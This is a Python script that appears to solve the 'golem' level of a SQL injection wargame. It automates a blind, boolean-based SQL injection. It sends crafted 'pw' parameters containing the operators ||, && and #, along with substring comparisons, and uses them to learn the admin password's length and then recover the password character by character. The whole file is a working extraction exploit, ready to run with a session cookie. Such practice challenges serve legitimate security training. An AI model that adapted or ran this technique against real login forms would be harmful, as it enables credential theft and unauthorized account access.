import requests

password=''
password_length = 0

URL = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}

for estimated_length in range(100):
    query={'pw': '\' || substring(id, 1, 1) < \'b\' && length(pw) < ' + str(estimated_length) + '#'}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if("Hello admin" in res.text):
        password_length = estimated_length - 1
        print("admin's password length is {}".format(password_length))
        break
      
if password_length < 1:
    print("Password length unknown")
    exit()

for current_password_length in range(1, password_length+1):
    for password_chr in range(ord('0'),ord('z')+1) :
        query={'pw': '\' || substring(id, 1, 1) < \'b\' && substring(pw,1,' + \
               str(current_password_length) + ') < \'' + password + chr(password_chr).capitalize() + '\'#'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if("Hello admin" in res.text):
            password = password + chr(password_chr - 1)
            print(password)
            break

if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))